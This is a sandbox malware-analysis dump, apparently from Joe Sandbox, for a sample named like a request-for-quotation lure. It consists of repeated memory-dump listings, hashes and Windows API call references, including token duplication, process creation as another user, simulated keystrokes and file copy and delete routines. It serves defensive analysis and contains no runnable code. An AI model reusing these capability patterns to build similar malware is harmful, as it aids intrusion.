                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                        • Opcode Fuzzy Hash: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: ec783aa1ebc181f1e071a9faa7f74e4a4b8ea4e749bbcb088fca64aa50fa2dab
                                                        • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                        • Opcode Fuzzy Hash: ec783aa1ebc181f1e071a9faa7f74e4a4b8ea4e749bbcb088fca64aa50fa2dab
                                                        • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 00444B34
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: _malloc_memmove
• String ID:
• API String ID: 1183979061-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 040B3BA1
Memory Dump Source
• Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(00B4E470,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(00B4E470,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,03011A38,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,03011A38,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3100379633-4164748364
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
• GetCurrentThreadId.KERNEL32 ref: 00434485
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
• keybd_event.USER32(00000012,00000000), ref: 004344E6
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
• keybd_event.USER32(00000012,00000000), ref: 004344FD
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
• keybd_event.USER32(00000012,00000000), ref: 00434514
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
Strings
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 2889586943-2988720461
                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                        APIs
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                        • _wcslen.LIBCMT ref: 00446498
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                        Strings
                                                        Similarity
                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                        • String ID: $@OH$default$winsta0
                                                        • API String ID: 3324942560-3791954436
                                                        • Opcode ID: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                        APIs
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                        Strings
                                                        Similarity
                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2188072990-1173974218
                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                        • __swprintf.LIBCMT ref: 004789D3
                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                        • __swprintf.LIBCMT ref: 00478A79
                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                        • __swprintf.LIBCMT ref: 00478B03
                                                        Strings
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 999945258-2428617273
                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                        • _wcscat.LIBCMT ref: 004034BC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                        • _wcslen.LIBCMT ref: 00403623
                                                        • _wcslen.LIBCMT ref: 0040367D
                                                        Strings
                                                        • Error opening the file, xrefs: 00428231
                                                        • Unterminated string, xrefs: 00428348
                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                        • _, xrefs: 0040371C
                                                        Similarity
                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                        • API String ID: 3393021363-188983378
                                                        • Opcode ID: c5e3c4a49faa7a981a1cf8f9c99aeda831f9ca6caf439e1dfa945647fe2f9d32
                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                        Strings
                                                        Similarity
                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1409584000-438819550
                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                        Strings
                                                        Similarity
                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2192556992-3457252023
                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                        • __swprintf.LIBCMT ref: 004722B9
                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                        Strings
                                                        Similarity
                                                        • API ID: FolderPath$LocalTime__swprintf
                                                        • String ID: %.3d
                                                        • API String ID: 3337348382-986655627
                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
